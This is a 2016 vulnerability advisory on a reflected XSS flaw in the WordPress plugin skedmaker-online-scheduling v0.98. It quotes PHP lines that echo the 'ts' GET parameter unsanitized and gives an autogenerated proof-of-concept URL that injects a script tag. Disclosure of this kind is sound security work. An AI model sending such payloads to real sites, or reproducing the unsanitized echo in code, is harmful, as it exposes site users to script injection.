Advisory #: 72
Title: Reflected XSS in wordpress plugin skedmaker-online-scheduling v0.98
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/skedmaker-online-scheduling
Downloads: 2666
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: skedmaker-online-scheduling
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./skedmaker-online-scheduling/_admin/_blocktime.php: 23:<form id="formblock" name="formblock" method="post" action="<?php echo $smadmin;?>&amp;v=blocktime&amp;ts=<?php echo $_GET['ts'];?>&amp;" style='margin: 0px; padding: 0px;'> 37:<a href='<?php echo $smadmin;?>&amp;v=home&amp;ts=<?php echo $_GET['ts']; ?>&' class='sked'><img src='<?php echo $sm_btns_dir;?>btn_home16_reg.png' class='btn' />No, Return to Admin Home Page</a> The variable ts appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./skedmaker-online-scheduling/_admin/_blocktime.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/skedmaker-online-scheduling/_admin/_blocktime.php?ts="><script>alert(1);</script><"